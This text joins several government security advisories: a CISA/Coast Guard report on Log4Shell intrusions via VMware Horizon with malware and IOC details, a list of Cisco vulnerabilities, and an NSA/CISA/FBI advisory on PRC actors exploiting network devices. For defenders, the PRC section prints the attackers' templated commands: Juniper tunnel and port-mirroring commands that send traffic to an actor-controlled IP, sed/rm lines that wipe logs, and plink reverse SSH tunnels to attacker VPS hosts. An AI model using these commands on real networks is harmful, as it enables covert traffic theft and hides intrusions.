CISA and CGCYBER analyzed a sample of hmsvc.exe from the confirmed compromise. hmsvc.exe masquerades as a legitimate Microsoft® Windows® service (SysInternals LogonSessions software) [T1036.004] and appears to be a modified version of SysInternals LogonSessions software embedded with malicious packed code. When discovered, the analyzed sample of hmsvc.exe was running as NT AUTHORITY\SYSTEM, the highest privilege level on a Windows system. It is unknown how the actors elevated privileges.
hmsvc.exe is a Windows loader containing an embedded executable, 658_dump_64.exe. The embedded executable is a remote access tool that provides an array of C2 capabilities, including the ability to log keystrokes [T1056.001], upload and execute additional payloads [T1105], and provide graphical user interface (GUI) access over a target Windows system's desktop. The malware can function as a C2 tunneling proxy [T1090], allowing a remote operator to pivot to other systems and move further into a network.
When first executed, hmsvc.exe creates the Scheduled Task [T1053.005], C:\Windows\System32\Tasks\Local Session Updater, which executes malware every hour. When executed, two randomly named *.tmp files are written to the disk at the location C:\Users\<USER>\AppData\Local\Temp\ and the embedded executable attempts to connect to hard-coded C2 server 192.95.20[.]8 over port 4443, a non-standard port [TT571]. The executable’s inbound and outbound communications are encrypted with a 128-bit key [T1573.001].
For more information on hmsvc.exe, including IOCs and detection signatures, see MAR-10382254-1.
Victim 2From late April through May 2022, CISA conducted an onsite incident response engagement at an organization (Victim 2) where CISA observed bi-directional traffic between the organization and suspected APT IP address 104.223.34[.]198. During incident response, CISA determined Victim 2 was compromised by multiple threat actor groups.
The threat actors using IP 104.223.34[.]198 gained initial access to Victim 2’s production environment in late January 2022, or earlier. These actors likely obtained access by exploiting Log4Shell in an unpatched VMware Horizon server. On or around January 30, likely shortly after the threat actors gained access, CISA observed the actors using PowerShell scripts [T1059.001] to callout to 109.248.150[.]13 via Hypertext Transfer Protocol (HTTP) [T1071.001] to retrieve additional PowerShell scripts. Around the same period, CISA observed the actors attempt to download [T1105] and execute a malicious file from 109.248.150[.]13. The activity started from IP address 104.155.149[.]103, which appears to be part of the actors’ C2 [TA0011] infrastructure.
After gaining initial access to the VMware Horizon server, the threat actors moved laterally [TA0008] via Remote Desktop Protocol (RDP) [T1021.001] to multiple other hosts in the production environment, including a security management server, a certificate server, a database containing sensitive law enforcement data, and a mail relay server. The threat actors also moved laterally via RDP to the organization’s disaster recovery network. The threat actors gained credentials [TA0006] for multiple accounts, including administrator accounts. It is unknown how these credentials were acquired.
After moving laterally to other production environment hosts and servers, the actors implanted loader malware on compromised servers containing executables enabling remote C2. The threat actors used compromised administrator accounts to run the loader malware. The loader malware appears to be modified versions of SysInternals LogonSessions, Du, or PsPing software. The embedded executables belong to the same malware family, are similar in design and functionality to 658_dump_64.exe, and provide C2 capabilities to a remote operator. These C2 capabilities include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute additional payloads. The embedded executables can also function as a proxy.
CISA found the following loader malware:
- SvcEdge.exe is a malicious Windows loader containing encrypted executable f7_dump_64.exe. When executed, SvcEdge.exe decrypts and loads f7_dump_64.exe into memory. During runtime, f7_dump_64.exe connects to hard-coded C2 server 134.119.177[.]107 over port 443.
- odbccads.exe is a malicious Windows loader containing an encrypted executable. When executed, odbccads.exe decrypts and loads the executable into memory. The executable attempts communication with the remote C2 address 134.119.177[.]107.
- praiser.exe is a Windows loader containing an encrypted executable. When executed, praiser.exe decrypts and loads the executable into memory. The executable attempts connection to hard-coded C2 address 162.245.190[.]203.
- fontdrvhosts.exe is a Windows loader that contains an encrypted executable. When executed, fontdrvhosts.exe decrypts and loads the executable into memory. The executable attempts connection to hard-coded C2 address 155.94.211[.]207.
- winds.exe is a Windows loader containing an encrypted malicious executable and was found on a server running as a service. During runtime, the encrypted executable is decrypted and loaded into memory. The executable attempts communication with hard-coded C2 address 185.136.163[.]104. winds.exe has complex obfuscation, hindering the analysis of its code structures. The executable’s inbound and outbound communications are encrypted with an XOR key [T1573.001].
For more information on these malware samples, including IOCs and detection signatures, see MAR-10382580-1.
Additionally, CISA identified a Java® Server Pages (JSP) application (error_401.js) functioning as a malicious webshell [T505.003] and a malicious Dynamic Link Library (DLL) file:
- error_401.jsp is a webshell designed to parse data and commands from incoming HTTP requests, providing a remote operator C2 capabilities over compromised Linux and Windows systems. error_401.jsp allows actors to retrieve files from the target system, upload files to the target system, and execute commands on the target system. rtelnet is used to execute commands on the target system. Commands and data sent are encrypted via RC4 [T1573.001]. For more information on error_401.jsp, including IOCs, see [MAR-10382580 2].
- newdev.dll ran as a service in the profile of a known compromised user on a mail relay server. The malware had path: C:\Users\<user>\AppData\Roaming\newdev.dll. The DLL may be the same newdev.dll attributed to the APT actors in open-source reporting; however, CISA was unable to recover the file for analysis.
Threat actors collected [TA0009] and likely exfiltrated [TA0010] data from Victim 2’s production environment. For a three week period, the security management and certificate servers communicated with the foreign IP address 92.222.241[.]76. During this same period, the security management server sent more than 130 gigabytes (GB) of data to foreign IP address 92.222.241[.]76, indicating the actors likely exfiltrated data from the production environment. CISA also found .rar files containing sensitive law enforcement investigation data [T1560.001] under a known compromised administrator account.
Note: the second threat actor group had access to the organization's test and production environments, and on or around April 13, 2022, leveraged CVE-2022-22954 to implant the Dingo J-spy webshell. According to trusted third-party reporting, multiple large organizations have been targeted by cyber actors leveraging CVE-2022-22954 and CVE-2022-22960. For more information on exploitation of CVE-2022-22954 and CVE-2022-22960, see CISA CSA Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control.
Incident ResponseIf administrators discover system compromise, CISA and CGCYBER recommend:
- Immediately isolating affected systems.
- Collecting and reviewing relevant logs, data, and artifacts.
- Considering soliciting support from a third-party incident response organization that can provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
- Reporting incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). To report cyber incidents to the Coast Guard pursuant to 33 CFR Section 101.305, contact the U.S. Coast Guard (USCG) National Response Center (NRC) (NRC@uscg.mil or 800-424-8802).
CISA and CGCYBER recommend organizations install updated builds to ensure affected VMware Horizon and UAG systems are updated to the latest version.
- If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat those VMware Horizon systems as compromised. Follow the pro-active incident response procedures outlined above prior to applying updates. If no compromise is detected, apply these updates as soon as possible.
- See VMware Security Advisory VMSA-2021-0028.13 and VMware Knowledge Base (KB) 87073 to determine which VMware Horizon components are vulnerable.
- Note: until the update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible.
- If upgrading is not immediately feasible, see KB87073 and KB87092 for vendor-provided temporary workarounds. Implement temporary solutions using an account with administrative privileges. Note that these temporary solutions should not be treated as permanent fixes; vulnerable components should be upgraded to the latest build as soon as possible.
- Prior to implementing any temporary solution, ensure appropriate backups have been completed.
- Verify successful implementation of mitigations by executing the vendor supplied script Horizon_Windows_Log4j_Mitigations.zip without parameters to ensure that no vulnerabilities remain. See KB87073 for details.
Additionally, CISA and CGCYBER recommend organizations:
- Keep all software up to date and prioritize patching known exploited vulnerabilities (KEVs).
- Minimize the internet-facing attack surface by hosting essential services on a segregated DMZ, ensuring strict network perimeter access controls, and not hosting internet-facing services non-essential to business operations. Where possible, implement regularly updated WAFs in front of public-facing services. WAFs can protect against web based exploitation using signatures and heuristics that are likely to block or alert on malicious traffic.
- Use best practices for identity and access management (IAM) by implementing multifactor authentication (MFA), enforcing use of strong passwords, and limiting user access through the principle of least privilege.
Recipients of this report are encouraged to contribute any additional information related to this threat.
- To request incident response resources or technical assistance related to these threats, email CISA at report@cisa.gov. To contact Coast Guard Cyber Command in relation to these threats, email maritimecyber@uscg.mil.
- To report cyber incidents to the Coast Guard pursuant to 33 CFR Section 101.305 contact the USCG NRC (NRC@uscg.mil or 800-424-8802).
- For more information on Log4Shell, see:
- CISA’s Apache Log4j Vulnerability Guidance webpage,
- Joint CSA Mitigating Log4Shell and Other Log4j-Related Vulnerabilities, or
- CISA’s database of known vulnerable services on the CISA GitHub® page.
- See National Security Agency (NSA) and Australian Signals Directorate (ASD) guidance Block and Defend Web Shell Malware for additional guidance on hardening internet-facing systems.
[1] VMware Security Advisory VMSA-2021-0028.13
[2] Fortinet’s blog New Milestones for Deep Panda: Log4Shell and Digitally Signed Fire Chili Rootkits
See MAR-10382580-1 and MAR-10382254-1 and Table 1 for IOCs. See the list below to download copies of these IOCs:
Table 1: Indicators of Compromise
Type Indicator Description IP Address 104.223.34[.]198 IP address closely associated with the installation of malware on victims. 92.222.241[.]76 Victim 2 servers communicated with this IP address and sent data to it during a three-week period. 109.248.150[.]13 Actors attempting to download and execute a malicious file from this address. 104.155.149[.]103 Appears to be a part of the actors’ C2 infrastructure. Network Port 192.95.20[.]8:80 Same description as IP 192.95.20[.]8, but includes the specific destination port of 80, which was identified in logs and during malware analysis. 1389 This was the most common destination port for Log4Shell exploitation outbound connections. Multiple unique destination addresses were used for Log4Shell callback. 104.223.34[.]198:443 IP address closely associated to the installation of malware on victims with the specific destination port of 443. Scheduled Task C:\Windows\System32\Tasks\Local Session Update Scheduled task created by hmsvc.exe to execute the program hourly. File Path C:\Windows\Temp\lnk{4_RANDOM_CHARS}.tmp File created by hmsvc.exe with a random four-character filename. C:\Windows\Temp\lnk<4_RANDOM_NUMS_CHAR S>.tmp File created by hmsvc.exe with a random four-character filename. Appendix B: Threat Actor TTPsSee Table 2 for the threat actors’ tactics and techniques identified in this CSA. See the MITRE ATT&CK for Enterprise framework, version 11, for all referenced threat actor tactics and techniques.
Table 2: Tactics and Techniques
Tactic Technique Initial Access [TA0001] Exploit Public-Facing Application [T1190]Execution [TA0002]
Command and Scripting Interpreter: PowerShell [T1059.001] Scheduled Task/Job: Scheduled Task [T1053.005] Persistence [TA0003] Server Software Component: Web Shell [T1505.003] Defense Evasion [TA0005] Masquerading: Masquerade Task or Service [T1036.004] Credential Access [TA0006] Lateral Movement [TA0008] Remote Services: Remote Desktop Protocol [T1021.001] Collection [TA0009] Archive Collected Data: Archive via Utility [T1560.001] Input Capture: Keylogging [T1056.001] Command and Control [TA0011] Application Layer Protocol: Web Protocols [T1071.001] Encrypted Channel: Symmetric Cryptography [1573.001] Ingress Tool Transfer [T1105] Non-Standard Port [T1571] Proxy [T1090] Disclaimer© 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
AcknowledgementsCISA and CGCYBER would like to thank VMware and Secureworks for their contributions to this CSA.
Revisions- June 23, 2022: Initial version
This product is provided subject to this Notification and this Privacy & Use policy.
Cisco Adaptive Security Device Manager and Adaptive Security Appliance Software Client-side Arbitrary Code Execution Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20829
Cisco FirePOWER Software for ASA FirePOWER Module Command Injection Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20828
Cisco Identity Services Engine Authentication Bypass Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20733
Cisco Email Security Appliance and Cisco Secure Email and Web Manager External Authentication Bypass Vulnerability
Security Impact Rating: Critical
CVE: CVE-2022-20798
Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Remote Command Execution and Denial of Service Vulnerability
Security Impact Rating: Critical
CVE: CVE-2022-20825
Cisco Identity Services Engine Sensitive Information Disclosure Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20819
Cisco Email Security Appliance and Cisco Secure Email and Web Manager Information Disclosure Vulnerability
Security Impact Rating: High
CVE: CVE-2022-20664
Cisco IP Phone Duplicate Key Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20817
Cisco AppDynamics Controller Authorization Bypass Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20736
Cisco Application Policy Infrastructure Controller App Privilege Escalation Vulnerability
Security Impact Rating: High
CVE: CVE-2021-1579
AA22-158A: People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices
Summary
Best Practices
• Apply patches as soon as possible
• Disable unnecessary ports and protocols
• Replace end-of-life infrastructure
• Implement a centralized patch management system
This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.
This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).
Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.
NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.
For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage.
Click here for PDF.
Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actorsPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.
Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133] or public facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems.
PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.
These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.
NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.
Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors
Vendor CVE Vulnerability Type Cisco CVE-2018-0171 Remote Code Execution CVE-2019-15271 RCE CVE-2019-1652 RCE Citrix CVE-2019-19781 RCE DrayTek CVE-2020-8515 RCE D-Link CVE-2019-16920 RCE Fortinet CVE-2018-13382 Authentication Bypass MikroTik CVE-2018-14847 Authentication Bypass Netgear CVE-2017-6862 RCE Pulse CVE-2019-11510 Authentication Bypass CVE-2021-22893 RCE QNAP CVE-2019-7192 Privilege Elevation CVE-2019-7193 Remote Inject CVE-2019-7194 XML Routing Detour Attack CVE-2019-7195 XML Routing Detour Attack Zyxel CVE-2020-29583 Authentication Bypass Telecommunications and network service provider targetingPRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.
Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts.
Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.
Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure.
While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:
set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.
set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>set routing-options static route <local network IP address> next-hop <actor controlled IP address>
PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure.
set firewall family inet filter <filter name> term <filter variable> then port-mirrorset forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.
sed -i -e '/<REGEX>/d' <log filepath 1>sed -i -e '/<REGEX>/d' <log filepath 2>
sed -i -e '/<REGEX>/d' <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.
plink.exe –N –R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>plink.exe –N –R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
Mitigations
NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:
- Keep systems and products updated and patched as soon as possible after patches are released [D3-SU] . Consider leveraging a centralized patch management system to automate and expedite the process.
- Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].
- Segment networks to limit or block lateral movement [D3-NI].
- Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF].
- Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA].
- Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity requirements [D3-SPP].
- Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [D3-SPP].
- Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures.
- Disable external management capabilities and set up an out-of-band management network [D3-NI].
- Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [D3-NI].
- Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].
- Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect these accounts with strict network policies [D3-UAP].
- Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [D3-PM].
- Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.
Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.
U.S. government and critical infrastructure organizations, should consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.
U.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email dib_defense@cyber.nsa.gov.
Additional References- CISA (2022), Weak Security Controls and Practices Routinely Exploited for Initial Access. https://www.cisa.gov/uscert/ncas/alerts/aa22-137a
- CISA (2022) 2021 Top Routinely Exploited Vulnerabilities. https://www.cisa.gov/uscert/ncas/alerts/aa22-117a
- NSA (2021), Selecting and Hardening Remote Access VPN Solutions. https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF
- NSA (2021), Chinese State-Sponsored Cyber Operations: Observed TTPs. https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF
- CISA (2021), Exploitation of Pulse Connect Secure Vulnerabilities. https://www.cisa.gov/uscert/ncas/alerts/aa21-110a
- NSA (2020), Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities. https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF
- CISA (2020), Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. https://www.cisa.gov/uscert/ncas/alerts/aa20-258a
- NSA (2020), Performing Out-of-Band Network Management. https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
- CISA (2020), Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP. https://www.cisa.gov/uscert/ncas/alerts/aa20-020a
- NSA (2019), Mitigating Recent VPN Vulnerabilities. https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf
- NSA (2019), Update and Upgrade Software Immediately. https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf
To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
Media Inquiries / Press Desk:
- NSA Media Relations, 443-634-0721, MediaRelations@nsa.gov
- CISA Media Relations, 703-235-2010, CISAMedia@cisa.dhs.gov
- FBI National Press Office, 202-324-3691, npo@fbi.gov
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
PurposeThis advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Appendix A: VulnerabilitiesTable 2: Information on Cisco CVE-2018-0171
Cisco CVE-2018-0171 CVSS 3.0: 9.8 (Critical)Vulnerability Description
A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, causing an indefinite loop on the affected device that triggers a watchdog crash.
Recommended Mitigations- Cisco has released software updates that address this vulnerability.
- In addition, the Cisco Smart Install feature is highly recommended to be disabled to reduce exposure.
- CISCO IOS Software Checker
Vulnerable Technologies and Versions
The vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have the smart install client feature enabled. Only smart install client switches are affected by this vulnerability described in this advisory.
References
http://www.securityfocus.com/bid/103538
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05
https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490
http://www.securitytracker.com/id/1040580
Table 3: Information on Cisco CVE-2019-15271
Cisco CVE-2019-15271 CVSS 3.0: 8.8 (High)Vulnerability Description
A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.
Recommended Mitigations- Cisco has released free software updates that address the vulnerability described in this advisory.
- Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.
- Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default.
- N/A
Vulnerable Technologies and Versions
This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:
- RV016 Multi-WAN VPN Router
- RV042 Dual WAN VPN Router
- RV042G Dual Gigabit WAN VPN Router
- RV082 Dual WAN VPN Router
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x
Table 4: Information on Cisco CVE-2019-1652
Cisco CVE-2019-1652 CVSS 3.0: 7.2 (High)Vulnerability Description
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.
Recommended Mitigations- Cisco has released free software updates that address the vulnerability described in this advisory
- This vulnerability is fixed in RV320 and RV325 Dual Gigabit WAN VPN Routers Firmware Release 1.4.2.22 and later.
- If the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure.
- N/A
Vulnerable Technologies and Versions
This vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware releases 1.4.2.15 through 1.4.2.20.
References
http://www.securityfocus.com/bid/106728
https://seclists.org/bugtraq/2019/Mar/55
https://www.exploit-db.com/exploits/46243/
https://www.exploit-db.com/exploits/46655/
http://seclists.org/fulldisclosure/2019/Mar/61
http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html
http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Table 5: Information on Citrix CVE-2019-19781
Citrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical)Vulnerability Description
An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
Recommended Mitigations- Implement the appropriate refresh according to the vulnerability details outlined by vendor: Citrix: Mitigation Steps for CVE-2019-19781.
- If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).
- CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.
- Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Critix ADC Path Traversal #1893.
- Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.
- CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.
Vulnerable Technologies and Versions
The vulnerability affects the following Citrix product versions on all supported platforms:
- Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24
- NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18
- NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13
- NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15
